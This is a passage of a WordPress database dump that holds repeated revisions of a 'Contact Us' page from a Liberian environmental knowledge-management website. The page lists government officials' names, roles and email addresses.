Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><strong>Urias Garsinii </strong><br>\nLand Use Management Manager, LLA<br>\n<a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:58:30','2021-01-18 12:58:30','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3350,42,'2021-01-18 12:58:30','2021-01-18 12:58:30','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 12:58:30','2021-01-18 12:58:30','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3351,42,'2021-01-18 13:03:06','2021-01-18 13:03:06','','golafale','','inherit','open','closed','','golafale','','','2021-01-18 13:03:06','2021-01-18 13:03:06','',80,'https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png',0,'attachment','image/png',0),(3352,42,'2021-01-18 13:03:33','2021-01-18 13:03:33','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-18 13:03:33','2021-01-18 13:03:33','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3353,42,'2021-01-18 13:03:33','2021-01-18 13:03:33','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/IMG_20200908_105852_513-ox8vdkzpdt8ppuxyxbm48bx7zb2jsiz8d9tn48rp4w.jpg\" title=\"IMG_20200908_105852_513\" alt=\"IMG_20200908_105852_513\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>Jeremiah Sokan Sr</strong><br />Coordinator Climate Change Secretariat, EPA<br /><a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a></p><p><strong>John K. Jallah</strong><br />Manager - Compliance and Enforcement, EPA<br />jjallah@epa.gov.lr</p><p><strong>Kawusu Toure</strong><br />Assistant Manager - Compliance and Enforcement, ESIA, EPA<br />kawumtoure@gmail.com</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Konikay Nimely</strong><br />EIA Manager, FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><strong>Edward S. Kamara</strong><br>\nMarketing and Forest Forecast<br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong><br>\nConservation Manager, FDA<br>\n<a href=\"mailto:blamag@gmail.com\">blamag@gmail.com</a><br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/aw2.jpg\" title=\"aw2\" alt=\"aw2\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"AlFreeman\" alt=\"AlFreeman\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"1\" alt=\"1\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p><p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of 